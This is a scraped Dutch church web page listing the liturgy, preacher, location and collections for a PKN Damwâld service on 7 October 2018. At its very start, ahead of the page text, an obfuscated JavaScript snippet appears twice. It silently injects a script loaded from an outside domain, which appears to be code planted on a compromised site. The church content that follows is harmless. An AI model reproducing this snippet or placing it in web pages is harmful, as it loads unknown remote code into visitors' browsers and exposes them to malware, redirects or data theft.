;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 7 oktober 2018 14:00 uur - PKN Damwâld
zondag 7 oktober 2018
14:00 uur

Kerkdienst zondag 7 oktober 2018 14:00 uur

Informatie

Voorganger:Ds. G. Timmer, Twijzelerheide/Burdaard
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Psalm 149: 1 en 5
Binnenkomst kerkenraad en voorganger
Intochtslied Gezang 3: 1, 3 en 6
Stil gebed, bemoediging en groet
We zingen: ELB 170: 1 en 2 + refrein
Gebed om de opening van het Woord
We lezen: Ezechiël 37: 1-14
We zingen: Psalm 33: 3 en 4
Verkondiging .
We zingen: Psalm 33: 7 en 8
Apostolische Geloofsbelijdenis .
We zingen: ELB 58: 1, 2 en 3 + Refrein
Dankgebed en voorbeden
Collecte
Slotlied : Psalm 84: 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Israëlzondag

Collecte Kerk en Israël - Het gesprek houdt nooit op
Voor de Protestantse Kerk is de relatie met Israël een essentieel element van de eigen identiteit. Ons geloof is voortgekomen uit de Joodse traditie. De Protestantse Kerk onderstreept de verbondenheid met het volk Israël. Op landelijk niveau zijn er contacten met Joods Nederland en komen thema's als antisemitisme ter sprake. Om plaatselijke gemeenten te stimuleren om deel te nemen aan het gesprek met en over Israël, ontwikkelt de Protestantse Kerk inspiratiematerialen, vinden er ontmoetings- en netwerkdagen plaats en verschijnt het tijdschrift Kerk en Israël Onderweg dat theologische bezinning en informatie combineert. Uw steun via de collecte maakt als deze activiteiten mogelijk. Opdat het gesprek met en over Israël nooit op zal houden

Tweede collecte: Kerk
Uitganscollecte: Kerk